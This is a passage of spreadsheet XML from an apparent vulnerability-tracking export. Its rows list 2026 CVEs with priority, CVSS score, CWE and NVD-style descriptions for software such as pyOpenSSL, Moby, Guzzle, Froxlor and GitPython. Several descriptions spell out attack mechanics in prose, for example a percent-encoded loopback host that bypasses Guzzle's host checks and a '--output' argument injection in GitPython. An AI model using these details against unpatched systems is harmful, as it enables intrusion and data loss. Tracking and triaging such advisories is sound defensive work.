      <c r="H3009" s="5" t="inlineStr">
        <is>
          <t>pyopenssl:pyopenssl</t>
        </is>
      </c>
      <c r="I3009" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J3009" s="5" t="inlineStr"/>
      <c r="K3009" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L3009" s="5" t="inlineStr">
        <is>
          <t>pyOpenSSL is a Python wrapper around the OpenSSL library. Starting in version 22.0.0 and prior to version 26.0.0, if a user provided callback to `set_cookie_generate_callback` returned a cookie value greater than 256 bytes, pyOpenSSL would overflow an OpenSSL provided buffer. Starting in version 26.0.0, cookie values that are too long are now rejected.</t>
        </is>
      </c>
      <c r="M3009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27459</t>
        </is>
      </c>
    </row>
    <row r="3010">
      <c r="A3010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34968</t>
        </is>
      </c>
      <c r="C3010" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3010" s="5" t="inlineStr"/>
      <c r="F3010" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3010" s="5" t="inlineStr"/>
      <c r="H3010" s="5" t="inlineStr"/>
      <c r="I3010" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3010" s="5" t="inlineStr"/>
      <c r="K3010" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3010" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains an arbitrary file deletion vulnerability in SQLite mode where the database-list drop action fails to validate file extensions before deletion. An authenticated attacker can submit arbitrary relative file paths in the db[] parameter to delete any files writable by the PHP process.</t>
        </is>
      </c>
      <c r="M3010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34968</t>
        </is>
      </c>
    </row>
    <row r="3011">
      <c r="A3011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38710</t>
        </is>
      </c>
      <c r="C3011" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3011" s="5" t="inlineStr"/>
      <c r="F3011" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G3011" s="5" t="inlineStr"/>
      <c r="H3011" s="5" t="inlineStr"/>
      <c r="I3011" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3011" s="5" t="inlineStr"/>
      <c r="K3011" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3011" s="5" t="inlineStr">
        <is>
          <t>TR1200 v2.4.15 and TR3000 v2.4.21 were discovered to contain a command injection vulnerability in the system.setclock interface. This vulnerability allows attackers to execute arbitrary commands as root via a crafted input.</t>
        </is>
      </c>
      <c r="M3011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38710</t>
        </is>
      </c>
    </row>
    <row r="3012">
      <c r="A3012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41567</t>
        </is>
      </c>
      <c r="C3012" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3012" s="5" t="inlineStr"/>
      <c r="F3012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3012" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3012" s="5" t="inlineStr"/>
      <c r="I3012" s="5" t="inlineStr">
        <is>
          <t>2026-06-05</t>
        </is>
      </c>
      <c r="J3012" s="5" t="inlineStr"/>
      <c r="K3012" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L3012" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. In versions prior to 29.5.1 and in moby/moby v2 prior to v2.0.0-beta.14, when a compressed archive is uploaded to a container via `PUT /containers/{id}/archive` or piped through `docker cp -`, the daemon resolves decompression binaries (such as `xz` or `unpigz`) from the container's filesystem rather than the host's due to incorrect ordering of operations. A malicious container image containing a trojanized decompression binary can achieve arbitrary code execution with full daemon privileges, including host root UID and unrestricted capabilities, when a user uploads a compressed (xz or gzip) archive into that container. This issue is fixed in Docker Engine 29.5.1 and moby/moby v2.0.0-beta.14. Workarounds include only running containers from trusted images, using authorization plugins to restrict access to the `PUT /containers/{id}/archive` endpoint, and avoiding piping compressed archives into containers created from untrusted images</t>
        </is>
      </c>
      <c r="M3012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41567</t>
        </is>
      </c>
    </row>
    <row r="3013">
      <c r="A3013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45019</t>
        </is>
      </c>
      <c r="C3013" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3013" s="5" t="inlineStr"/>
      <c r="F3013" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3013" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3013" s="5" t="inlineStr"/>
      <c r="I3013" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3013" s="5" t="inlineStr"/>
      <c r="K3013" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3013" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For sse and streamable-http transports, ConnectSseMCPRequest and ConnectStreamableHttpMCPRequest in backend/chainlit/types.py accept a user-controlled url and optional headers dictionary without scheme validation, private-address filtering, or an allowlist. The connect_mcp handler in backend/chainlit/server.py passes these values to sse_client() or streamablehttp_client(), allowing the Chainlit server to make blind outbound requests to arbitrary internal or external services, including cloud metadata endpoints, with attacker-controlled Authorization and Cookie headers. The SSE URL sink has existed since 2.4.0rc0, while attacker-controlled header forwarding and streamable-http support were added in 2.6.4. The response is consumed internally and not returned, but the attacker can issue state-changing authenticated requests, discover internal services, scan ports, and probe metadata endpoints. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M3013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45019</t>
        </is>
      </c>
    </row>
    <row r="3014">
      <c r="A3014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53499</t>
        </is>
      </c>
      <c r="C3014" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3014" s="5" t="inlineStr"/>
      <c r="F3014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3014" s="5" t="inlineStr"/>
      <c r="H3014" s="5" t="inlineStr"/>
      <c r="I3014" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3014" s="5" t="inlineStr"/>
      <c r="K3014" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L3014" s="5" t="inlineStr">
        <is>
          <t>FORT Validator is a Resource Public Key Infrastructure (RPKI) relying-party validator that produces validated route-origin data. FORT Validator versions through 1.6.7 contain an origin-validation error in their RRDP processing: a delegated CA under the same Trust Anchor Locator (TAL) can reference a victim CA’s public RRDP notification and snapshot URLs, causing FORT’s URL-based download cache to report success after deleting the victim’s local snapshot. Following a routine victim publication, this can silently remove the victim’s VRPs and other signed objects from FORT’s output, potentially enabling route hijacking or loss of reachability. Version 1.6.8 contains a patch that rejects cross-origin RRDP snapshot and delta URLs; as a workaround, administrators can disable HTTP/RRDP with  --http.enabled=false  while keeping rsync enabled, although this can leave data unavailable or stale where rsync is not supported.</t>
        </is>
      </c>
      <c r="M3014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53499</t>
        </is>
      </c>
    </row>
    <row r="3015">
      <c r="A3015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54348</t>
        </is>
      </c>
      <c r="C3015" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3015" s="5" t="inlineStr"/>
      <c r="F3015" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3015" s="5" t="inlineStr"/>
      <c r="H3015" s="5" t="inlineStr"/>
      <c r="I3015" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3015" s="5" t="inlineStr"/>
      <c r="K3015" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3015" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, the Admins.add and Admins.update endpoints in lib/Froxlor/Api/Commands/Admins.php accept an attacker-controlled ipaddress array and store it as JSON in panel_admins.ip without enforcing numeric element types. When the poisoned account later calls IpsAndPorts.listing, lib/Froxlor/Api/Commands/IpsAndPorts.php decodes the array and concatenates its elements into a SQL IN clause without casting or parameterization; the same unsafe pattern is present in lib/Froxlor/Api/Commands/Domains.php. An authenticated administrator with change_serversettings permission can store a UNION-based payload and trigger it through the poisoned account to retrieve arbitrary database data, including administrator login names and bcrypt password hashes, with potential privilege escalation and broader database impact. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M3015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54348</t>
        </is>
      </c>
    </row>
    <row r="3016">
      <c r="A3016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54605</t>
        </is>
      </c>
      <c r="C3016" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3016" s="5" t="inlineStr"/>
      <c r="F3016" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3016" s="5" t="inlineStr"/>
      <c r="H3016" s="5" t="inlineStr"/>
      <c r="I3016" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J3016" s="5" t="inlineStr"/>
      <c r="K3016" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346, CWE-918</t>
        </is>
      </c>
      <c r="L3016" s="5" t="inlineStr">
        <is>
          <t>OAuth is a Ruby wrapper for the OAuth 1.0 and 1.0a protocols, providing clients and servers. From 0.5.5 to 1.1.5, OAuth::Consumer#token_request parses the raw Location header of a 300 to 399 redirect returned by the OAuth server and follows the redirect recursively, which can mutate the consumer's configuration and expose signed OAuth request metadata, including the Authorization header, to a cross-origin host. This issue is fixed in version 1.1.6.</t>
        </is>
      </c>
      <c r="M3016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54605</t>
        </is>
      </c>
    </row>
    <row r="3017">
      <c r="A3017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54718</t>
        </is>
      </c>
      <c r="C3017" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3017" s="5" t="inlineStr"/>
      <c r="F3017" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3017" s="5" t="inlineStr"/>
      <c r="H3017" s="5" t="inlineStr"/>
      <c r="I3017" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3017" s="5" t="inlineStr"/>
      <c r="K3017" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3017" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Advanced Workflow is a highly configurable step-based workflow module. Prior to 6.4.5, 7.1.3, and 7.2.1, an attacker with permission to author the advanced workflow email template can place a specially crafted server-side template payload in NotifyUsersWorkflowAction.EmailTemplate. When NotifyUsersWorkflowAction renders the field through the Silverstripe template engine SSTemplateParser, the payload can cause PHP evaluation and arbitrary code execution on the server; the regression coverage is in tests/php/WorkflowEngineTest.php. This issue is fixed in versions 6.4.5, 7.1.3, and 7.2.1.</t>
        </is>
      </c>
      <c r="M3017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54718</t>
        </is>
      </c>
    </row>
    <row r="3018">
      <c r="A3018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55192</t>
        </is>
      </c>
      <c r="C3018" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3018" s="5" t="inlineStr"/>
      <c r="F3018" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3018" s="5" t="inlineStr"/>
      <c r="H3018" s="5" t="inlineStr"/>
      <c r="I3018" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3018" s="5" t="inlineStr"/>
      <c r="K3018" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3018" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP H.264 decoder backends can return YUV planes sized from the bitstream without comparing the decoded width and height to the RDPGFX surface dimensions used to validate region rectangles. A malicious RDP server can provide an AVC420 or AVC444 bitstream whose decoded frame is smaller than the negotiated surface, causing yuv420_context_decode and the YUV-to-RGB conversion paths to read beyond the decoder-owned planes in libfreerdp/codec/h264.c and the selected H.264 backend. This can disclose client memory or crash the client. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M3018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55192</t>
        </is>
      </c>
    </row>
    <row r="3019">
      <c r="A3019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6431</t>
        </is>
      </c>
      <c r="C3019" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3019" s="5" t="inlineStr"/>
      <c r="F3019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3019" s="5" t="inlineStr"/>
      <c r="H3019" s="5" t="inlineStr"/>
      <c r="I3019" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3019" s="5" t="inlineStr"/>
      <c r="K3019" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3019" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Biographical Info' meta field parameter in all versions up to, and including, 3.15.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6431</t>
        </is>
      </c>
    </row>
    <row r="3020">
      <c r="A3020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69246</t>
        </is>
      </c>
      <c r="C3020" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3020" s="5" t="inlineStr"/>
      <c r="F3020" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3020" s="5" t="inlineStr"/>
      <c r="H3020" s="5" t="inlineStr"/>
      <c r="I3020" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3020" s="5" t="inlineStr"/>
      <c r="K3020" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-436, CWE-918, CWE-941</t>
        </is>
      </c>
      <c r="L3020" s="5" t="inlineStr">
        <is>
          <t>Guzzle is an extensible PHP HTTP client. Prior to 7.15.2 and 8.0.1, Guzzle gives a transport the request URI as text and supplies the Host header separately. The cURL handlers set CURLOPT_URL to the URI exactly as written and push that Host into CURLOPT_HTTPHEADER; StreamHandler does the same through fopen(). libcurl then parses the authority itself, percent-decoding it and, on an IDN-capable build, applying IDNA mapping, and uses the result to resolve, connect, name the TLS peer and address a proxy CONNECT, while the supplied Host suppresses the aligned one libcurl would have generated. For a URI host written as 127.0.0.%31, filter_var() rejects the host as an IP literal, yet libcurl decodes it to 127.0.0.1 and reaches loopback with no DNS lookup while the server receives Host: 127.0.0.%31. An attacker who influences a fetched URI can therefore reach a host the application's checks excluded and read whatever the host exposes of the response. The same divergence moves Guzzle's own decisions onto a spelling the transport does not use: no_proxy selects proxy routing from the literal host, and RedirectMiddleware decides from it whether to strip Authorization and Cookie. Exploitation requires the application to build a request URI from untrusted input and to make a host decision before handing it to Guzzle. This issue is fixed in versions 7.15.2 and 8.0.1.</t>
        </is>
      </c>
      <c r="M3020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69246</t>
        </is>
      </c>
    </row>
    <row r="3021">
      <c r="A3021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69252</t>
        </is>
      </c>
      <c r="C3021" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3021" s="5" t="inlineStr"/>
      <c r="F3021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3021" s="5" t="inlineStr"/>
      <c r="H3021" s="5" t="inlineStr"/>
      <c r="I3021" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3021" s="5" t="inlineStr"/>
      <c r="K3021" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3021" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the /api/v1/files route was protected only by the feat:files feature gate and did not enforce checkPermission on GET or DELETE. A low-privileged authenticated API key with unrelated permissions could call GET /api/v1/files to list files under the organization storage root and DELETE /api/v1/files?path=... to delete files belonging to other workspaces in the same organization because getAllFiles and deleteFile used activeOrganizationId and a user-controlled path without restricting access by permissions or activeWorkspaceId. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69252</t>
        </is>
      </c>
    </row>
    <row r="3022">
      <c r="A3022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70608</t>
        </is>
      </c>
      <c r="C3022" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3022" s="5" t="inlineStr"/>
      <c r="F3022" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3022" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3022" s="5" t="inlineStr"/>
      <c r="I3022" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3022" s="5" t="inlineStr"/>
      <c r="K3022" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-693</t>
        </is>
      </c>
      <c r="L3022" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 41.10.3, and 42.0.1, a sandboxed iframe without the allow-popups keyword could still open a new window or trigger setWindowOpenHandler with no user interaction because new-window navigations taking the OpenURL path did not apply the iframe sandbox popup restriction. Apps that embed untrusted content in sandboxed iframes and rely on the absence of allow-popups to prevent window creation are affected, while apps that deny window creation in setWindowOpenHandler or do not embed untrusted content in sandboxed iframes are not affected. This issue is fixed in 39.8.10, 41.10.3, and 42.0.1.</t>
        </is>
      </c>
      <c r="M3022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70608</t>
        </is>
      </c>
    </row>
    <row r="3023">
      <c r="A3023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71506</t>
        </is>
      </c>
      <c r="C3023" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3023" s="5" t="inlineStr"/>
      <c r="F3023" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3023" s="5" t="inlineStr"/>
      <c r="H3023" s="5" t="inlineStr"/>
      <c r="I3023" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3023" s="5" t="inlineStr"/>
      <c r="K3023" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3023" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the payments REST API delete endpoint that allows authenticated attackers with invoice-deletion rights to permanently delete any payment record by bypassing the intended payment-issuance rights check. Attackers can exploit this misconfigured permission check to zero paid amounts on invoices and remove entries from accounting exports, causing financial data integrity loss.</t>
        </is>
      </c>
      <c r="M3023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71506</t>
        </is>
      </c>
    </row>
    <row r="3024">
      <c r="A3024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72825</t>
        </is>
      </c>
      <c r="C3024" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3024" s="5" t="inlineStr"/>
      <c r="F3024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3024" s="5" t="inlineStr"/>
      <c r="H3024" s="5" t="inlineStr"/>
      <c r="I3024" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3024" s="5" t="inlineStr"/>
      <c r="K3024" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3024" s="5" t="inlineStr">
        <is>
          <t>The getgrav/grav-plugin-api plugin before 1.0.13 contains an API-key scope cap bypass in the POST /reports/twig-content/allowlist endpoint (ReportsController). The endpoint enforces requirePermission('api.config.write') followed by a bare isSuperAdmin() check instead of requireSuper(). Because isSuperAdmin() reads access.api.super directly and never consults api_key_scopes, a least-privilege API key scoped to api.config.write minted on a super account passes the gate, allowing an attacker to append attacker-chosen tokens to the security.twig_sandbox allowlist (persisted to user/config/security.yaml). Widening the allowlist turns any subsequent Twig-in-content render into an SSTI/RCE sink.</t>
        </is>
      </c>
      <c r="M3024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72825</t>
        </is>
      </c>
    </row>
    <row r="3025">
      <c r="A3025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73613</t>
        </is>
      </c>
      <c r="C3025" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3025" s="5" t="inlineStr"/>
      <c r="F3025" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3025" s="5" t="inlineStr"/>
      <c r="H3025" s="5" t="inlineStr"/>
      <c r="I3025" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3025" s="5" t="inlineStr"/>
      <c r="K3025" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3025" s="5" t="inlineStr">
        <is>
          <t>filebrowser versions before 2.63.19 contain an out-of-scope file deletion vulnerability in the TUS upload cache eviction mechanism that allows authenticated users with only Create permission to delete arbitrary files outside their scope. Attackers can swap an ancestor directory with a symlink during the cache TTL window to redirect the raw os.Remove call to an out-of-scope target, bypassing ScopedFs scope guards and Perm.Delete checks.</t>
        </is>
      </c>
      <c r="M3025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73613</t>
        </is>
      </c>
    </row>
    <row r="3026">
      <c r="A3026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73624</t>
        </is>
      </c>
      <c r="C3026" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3026" s="5" t="inlineStr"/>
      <c r="F3026" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3026" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3026" s="5" t="inlineStr"/>
      <c r="I3026" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3026" s="5" t="inlineStr"/>
      <c r="K3026" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3026" s="5" t="inlineStr">
        <is>
          <t>GitPython versions before 3.1.54 contain an arbitrary file overwrite vulnerability in the Diffable.diff method that fails to validate git options passed through kwargs. Attackers can supply the --output argument via the other parameter or output kwarg to write patch content to attacker-chosen file paths at process privilege level.</t>
        </is>
      </c>
      <c r="M3026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73624</t>
        </is>
      </c>
    </row>
    <row r="3027">
      <c r="A3027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="C3027" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3027" s="5" t="inlineStr"/>
      <c r="F3027" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3027" s="5" t="inlineStr"/>
      <c r="H3027" s="5" t="inlineStr"/>
      <c r="I3027" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3027" s="5" t="inlineStr"/>
      <c r="K3027" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3027" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="M3027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="3028">
      <c r="A3028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="C3028" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3028" s="5" t="inlineStr"/>
      <c r="F3028" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3028" s="5" t="inlineStr"/>
      <c r="H3028" s="5" t="inlineStr"/>
      <c r="I3028" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
